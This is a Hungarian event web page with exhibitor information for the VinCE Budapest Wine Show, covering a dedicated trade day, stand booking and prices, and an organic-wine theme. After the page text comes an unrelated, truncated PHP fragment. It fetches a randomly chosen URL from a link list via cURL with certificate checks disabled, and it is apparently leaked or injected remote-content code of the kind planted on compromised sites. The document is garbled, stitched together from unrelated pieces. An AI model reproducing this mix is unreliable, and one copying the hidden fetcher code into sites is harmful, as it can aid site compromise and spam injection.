Kiállítói infó


Mért érdemes kiállítani a VinCE Budapest Wine Show-n?
Kérjük, olvassal el tájékoztatónkat itt.
VinCE_Budapest_kiállítói_info

Március 3.: dedikált szakmai nap
MGB_8040
A VinCE Budapest telefonos felmérést végzett a borászatok körében, és a válaszok feldolgozása után egyértelművé vált, hogy kiállítóink egyik legfontosabb igénye egy dedikált szakmai nap. Az igényekre reflektálva a VinCE Budapest első napját 2016-ban szakmai nappá tesszük. A szakmai napon csak azok vehetnek részt, akik teljes állásban az ital- vagy a HoReCa-szektor tagjai. A szakmai vendégek esetében az azonosító kártya viselése kötelező lesz, így kiállítóink mindig tudni fogják, hogy melyik szakember kóstol standjuknál. A pénteki napon szakmabeliek és nem szakmabeliek egyaránt résztvehetnek.

Kiállítói hely – a gyorsabb választhat!
A 2015-ös rendezvényünkön kezdtük azt a demokratikus standválasztási formát, miszerint a standok foglalása „érkezési sorrendben” történik. A térképet folyamatosan frissítjük, a foglalt asztalok színe pirosra vált, így leendő kiállítóink könnyen követhetik a még elérhető asztalok számát.
A zöld téglalapok a szabad, normál árú kiállítói helyeket jelölik (borászatok esetében 160 000 Ft + áfa).
A kék téglalapok a kiemelt helyek, ugyanis ezek elhelyezkedésükből adódóan látogatottabb helyen vannak (a kiemelt stand ára borászatok esetében 180 000 Ft + áfa.)
A lila téglalapok ára egyedi, amennyiben ezek után érdeklődik, kérjük, keresse Gál Boglárka kollégánkat.
A piros téglalapok a már elkelt, foglalt asztalokat jelzik.

map-feb16c

„Green is sexy!”

A Párizsi Klímacsúcs is rávilágított arra, hogy környezetünk védelmében az utolsó órához értünk. Soha nem volt ennyire fontos, hogy minden létező eszközzel csökkentsük a kemikáliák használatát. A VinCE csatlakozik a bolygónk megmentését célzó törekvésekhez, ennek egyik eleme, hogy a környezetvédelem kiemelt szerepet kap a 2016 márciusi rendezvényen.
Ennek egyik eleme az a speciális térkép lesz, amelyen jelöljük az organikus termelőket, és arra buzdítjuk látogatóinkat, hogy keressék fel mindegyik termelő standját. Az előadások közt is találnak majd témába vágót, ilyen lesz például a kénszint csökkentéséről szóló workshop, ahol olasz, francia és új-zélandi borokon keresztül vizsgálhatjuk a kérdést.

 

 


html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>